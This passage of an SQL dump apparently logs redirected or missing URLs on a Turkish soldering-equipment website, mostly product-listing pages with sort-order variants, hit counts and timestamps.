00:00:00',301),(42025,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 03:37:55','0000-00-00 00:00:00',301),(42026,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 03:37:57','0000-00-00 00:00:00',301),(42027,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-29 03:37:59','0000-00-00 00:00:00',301),(42028,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 03:38:01','0000-00-00 00:00:00',301),(42029,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2025-06-29 03:38:03','0000-00-00 00:00:00',301),(42030,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 03:38:05','0000-00-00 00:00:00',301),(42031,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,ordering',NULL,'','',1,0,'2025-06-29 03:38:06','0000-00-00 00:00:00',301),(42032,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 03:38:08','0000-00-00 00:00:00',301),(42033,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 03:38:10','0000-00-00 00:00:00',301),(42034,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_name',NULL,'','',1,0,'2025-06-29 03:38:12','0000-00-00 00:00:00',301),(42035,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h??/by,category_name',NULL,'','',1,0,'2025-06-29 04:31:10','0000-00-00 00:00:00',301),(42036,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 04:31:12','0000-00-00 00:00:00',301),(42037,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name',NULL,'','',2,0,'2025-06-29 04:31:14','0000-00-00 00:00:00',301),(42038,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 04:31:16','0000-00-00 00:00:00',301),(42039,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,ordering',NULL,'','',2,0,'2025-06-29 04:31:18','0000-00-00 00:00:00',301),(42040,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 04:31:20','0000-00-00 00:00:00',301),(42041,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 04:31:22','0000-00-00 00:00:00',301),(42042,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,product_name',NULL,'','',2,0,'2025-06-29 04:31:23','0000-00-00 00:00:00',301),(42043,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 04:31:25','0000-00-00 00:00:00',301),(42044,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f?n/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-06-29 05:03:01','0000-00-00 00:00:00',301),(42045,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-f??n/by,product_sku?language=tr-tr',NULL,'','',2,0,'2025-06-29 05:03:04','0000-00-00 00:00:00',301),(42046,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_sku',NULL,'','',2,0,'2025-06-29 05:03:08','0000-00-00 00:00:00',301),(42047,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-d????k-h??zl??/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-06-29 05:03:12','0000-00-00 00:00:00',301),(42048,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-h?z/by,mf_name',NULL,'','',2,0,'2025-06-29 05:03:19','0000-00-00 00:00:00',301),(42049,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 05:03:21','0000-00-00 00:00:00',301),(42050,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/by,product_sku',NULL,'','',2,0,'2025-06-29 05:03:23','0000-00-00 00:00:00',301),(42051,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:24','0000-00-00 00:00:00',301),(42052,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',2,0,'2025-06-29 05:03:26','0000-00-00 00:00:00',301),(42053,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 05:03:28','0000-00-00 00:00:00',301),(42054,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-detail',NULL,'','',2,0,'2025-06-29 05:03:30','0000-00-00 00:00:00',301),(42055,'http://3s-technologies.com.tr/tr/urunler/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 05:03:32','0000-00-00 00:00:00',301),(42056,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',2,0,'2025-06-29 05:03:34','0000-00-00 00:00:00',301),(42057,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:03:36','0000-00-00 00:00:00',301),(42058,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:37','0000-00-00 00:00:00',301),(42059,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',2,0,'2025-06-29 05:03:39','0000-00-00 00:00:00',301),(42060,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:41','0000-00-00 00:00:00',301),(42061,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',2,0,'2025-06-29 05:03:43','0000-00-00 00:00:00',301),(42062,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:45','0000-00-00 00:00:00',301),(42063,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',2,0,'2025-06-29 05:03:47','0000-00-00 00:00:00',301),(42064,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 05:03:49','0000-00-00 00:00:00',301),(42065,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:50','0000-00-00 00:00:00',301),(42066,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',2,0,'2025-06-29 05:03:52','0000-00-00 00:00:00',301),(42067,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:54','0000-00-00 00:00:00',301),(42068,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',2,0,'2025-06-29 05:03:56','0000-00-00 00:00:00',301),(42069,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',2,0,'2025-06-29 05:03:58','0000-00-00 00:00:00',301),(42070,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',2,0,'2025-06-29 05:03:59','0000-00-00 00:00:00',301),(42071,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:04:01','0000-00-00 00:00:00',301),(42072,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:03','0000-00-00 00:00:00',301),(42073,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,category_name',NULL,'','',2,0,'2025-06-29 05:04:05','0000-00-00 00:00:00',301),(42074,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:07','0000-00-00 00:00:00',301),(42075,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name',NULL,'','',2,0,'2025-06-29 05:04:09','0000-00-00 00:00:00',301),(42076,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:10','0000-00-00 00:00:00',301),(42077,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,ordering',NULL,'','',2,0,'2025-06-29 05:04:12','0000-00-00 00:00:00',301),(42078,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 05:04:14','0000-00-00 00:00:00',301),(42079,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:16','0000-00-00 00:00:00',301),(42080,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_name',NULL,'','',2,0,'2025-06-29 05:04:18','0000-00-00 00:00:00',301),(42081,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:20','0000-00-00 00:00:00',301),(42082,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/by,product_sku',NULL,'','',2,0,'2025-06-29 05:04:21','0000-00-00 00:00:00',301),(42083,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-f?r??n/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:23','0000-00-00 00:00:00',301),(42084,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??',NULL,'','',2,0,'2025-06-29 05:04:25','0000-00-00 00:00:00',301),(42085,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:04:27','0000-00-00 00:00:00',301),(42086,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:29','0000-00-00 00:00:00',301),(42087,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,category_name',NULL,'','',2,0,'2025-06-29 05:04:31','0000-00-00 00:00:00',301),(42088,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:32','0000-00-00 00:00:00',301),(42089,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,mf_name',NULL,'','',2,0,'2025-06-29 05:04:34','0000-00-00 00:00:00',301),(42090,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:36','0000-00-00 00:00:00',301),(42091,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,ordering',NULL,'','',2,0,'2025-06-29 05:04:38','0000-00-00 00:00:00',301),(42092,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 05:04:40','0000-00-00 00:00:00',301),(42093,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:41','0000-00-00 00:00:00',301),(42094,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_name',NULL,'','',2,0,'2025-06-29 05:04:43','0000-00-00 00:00:00',301),(42095,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:45','0000-00-00 00:00:00',301),(42096,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/by,product_sku',NULL,'','',2,0,'2025-06-29 05:04:47','0000-00-00 00:00:00',301),(42097,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-h?zl??/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:49','0000-00-00 00:00:00',301),(42098,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z',NULL,'','',2,0,'2025-06-29 05:04:51','0000-00-00 00:00:00',301),(42099,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:04:52','0000-00-00 00:00:00',301),(42100,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:54','0000-00-00 00:00:00',301),(42101,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,category_name',NULL,'','',2,0,'2025-06-29 05:04:56','0000-00-00 00:00:00',301),(42102,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:04:58','0000-00-00 00:00:00',301),(42103,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,mf_name',NULL,'','',2,0,'2025-06-29 05:05:00','0000-00-00 00:00:00',301),(42104,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:02','0000-00-00 00:00:00',301),(42105,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',2,0,'2025-06-29 05:05:04','0000-00-00 00:00:00',301),(42106,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 05:05:05','0000-00-00 00:00:00',301),(42107,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:07','0000-00-00 00:00:00',301),(42108,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,product_name',NULL,'','',2,0,'2025-06-29 05:05:09','0000-00-00 00:00:00',301),(42109,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:11','0000-00-00 00:00:00',301),(42110,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/by,product_sku',NULL,'','',2,0,'2025-06-29 05:05:12','0000-00-00 00:00:00',301),(42111,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:14','0000-00-00 00:00:00',301),(42112,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??',NULL,'','',2,0,'2025-06-29 05:05:16','0000-00-00 00:00:00',301),(42113,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:05:18','0000-00-00 00:00:00',301),(42114,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:20','0000-00-00 00:00:00',301),(42115,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku',NULL,'','',2,0,'2025-06-29 05:05:21','0000-00-00 00:00:00',301),(42116,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-h?zl??/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:23','0000-00-00 00:00:00',301),(42117,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z',NULL,'','',2,0,'2025-06-29 05:05:25','0000-00-00 00:00:00',301),(42118,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 05:05:27','0000-00-00 00:00:00',301),(42119,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:29','0000-00-00 00:00:00',301),(42120,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,category_name',NULL,'','',2,0,'2025-06-29 05:05:31','0000-00-00 00:00:00',301),(42121,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:32','0000-00-00 00:00:00',301),(42122,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,mf_name',NULL,'','',2,0,'2025-06-29 05:05:34','0000-00-00 00:00:00',301),(42123,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 05:05:36','0000-00-00 00:00:00',301),(42124,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,ordering',NULL,'','',2,0,'2025-06-29 05:05:38','0000-00-00 00:00:00',301),(42125,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 05:05:40','0000-00-00 00:00:00',301),(42126,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:19:50','0000-00-00 00:00:00',301),(42127,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 06:19:52','0000-00-00 00:00:00',301),(42128,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:19:54','0000-00-00 00:00:00',301),(42129,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/by,product_sku',NULL,'','',1,0,'2025-06-29 06:19:55','0000-00-00 00:00:00',301),(42130,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 06:19:57','0000-00-00 00:00:00',301),(42131,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n',NULL,'','',1,0,'2025-06-29 06:19:59','0000-00-00 00:00:00',301),(42132,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 06:20:00','0000-00-00 00:00:00',301),(42133,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 06:20:02','0000-00-00 00:00:00',301),(42134,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 06:20:04','0000-00-00 00:00:00',301),(42135,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:20:05','0000-00-00 00:00:00',301),(42136,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 06:20:07','0000-00-00 00:00:00',301),(42137,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:20:09','0000-00-00 00:00:00',301),(42138,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 06:20:11','0000-00-00 00:00:00',301),(42139,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:12','0000-00-00 00:00:00',301),(42140,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,product_name',NULL,'','',2,0,'2025-06-29 06:20:14','0000-00-00 00:00:00',301),(42141,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:16','0000-00-00 00:00:00',301),(42142,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-f?r??n/dirdesc',NULL,'','',1,0,'2025-06-29 06:20:18','0000-00-00 00:00:00',301),(42143,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 06:20:19','0000-00-00 00:00:00',301),(42144,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 06:20:21','0000-00-00 00:00:00',301),(42145,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:23','0000-00-00 00:00:00',301),(42146,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,category_name',NULL,'','',2,0,'2025-06-29 06:20:24','0000-00-00 00:00:00',301),(42147,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:26','0000-00-00 00:00:00',301),(42148,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,mf_name',NULL,'','',2,0,'2025-06-29 06:20:28','0000-00-00 00:00:00',301),(42149,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:29','0000-00-00 00:00:00',301),(42150,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 06:20:31','0000-00-00 00:00:00',301),(42151,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:33','0000-00-00 00:00:00',301),(42152,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,product_name',NULL,'','',2,0,'2025-06-29 06:20:34','0000-00-00 00:00:00',301),(42153,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:36','0000-00-00 00:00:00',301),(42154,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-h?zl??/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:38','0000-00-00 00:00:00',301),(42155,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z',NULL,'','',2,0,'2025-06-29 06:20:40','0000-00-00 00:00:00',301),(42156,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 06:20:42','0000-00-00 00:00:00',301),(42157,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:43','0000-00-00 00:00:00',301),(42158,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,category_name',NULL,'','',2,0,'2025-06-29 06:20:45','0000-00-00 00:00:00',301),(42159,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:47','0000-00-00 00:00:00',301),(42160,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,mf_name',NULL,'','',2,0,'2025-06-29 06:20:49','0000-00-00 00:00:00',301),(42161,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:51','0000-00-00 00:00:00',301),(42162,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 06:20:53','0000-00-00 00:00:00',301),(42163,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:54','0000-00-00 00:00:00',301),(42164,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,product_name',NULL,'','',2,0,'2025-06-29 06:20:56','0000-00-00 00:00:00',301),(42165,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:20:58','0000-00-00 00:00:00',301),(42166,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-h?z/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:00','0000-00-00 00:00:00',301),(42167,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n',NULL,'','',2,0,'2025-06-29 06:21:01','0000-00-00 00:00:00',301),(42168,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 06:21:03','0000-00-00 00:00:00',301),(42169,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:05','0000-00-00 00:00:00',301),(42170,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,category_name',NULL,'','',2,0,'2025-06-29 06:21:07','0000-00-00 00:00:00',301),(42171,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:09','0000-00-00 00:00:00',301),(42172,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,mf_name',NULL,'','',2,0,'2025-06-29 06:21:10','0000-00-00 00:00:00',301),(42173,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:12','0000-00-00 00:00:00',301),(42174,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,ordering',NULL,'','',2,0,'2025-06-29 06:21:14','0000-00-00 00:00:00',301),(42175,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 06:21:16','0000-00-00 00:00:00',301),(42176,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:17','0000-00-00 00:00:00',301),(42177,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,product_name',NULL,'','',2,0,'2025-06-29 06:21:19','0000-00-00 00:00:00',301),(42178,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:21','0000-00-00 00:00:00',301),(42179,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/by,product_sku',NULL,'','',2,0,'2025-06-29 06:21:23','0000-00-00 00:00:00',301),(42180,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/smd-f?r??n/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:24','0000-00-00 00:00:00',301),(42181,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??',NULL,'','',2,0,'2025-06-29 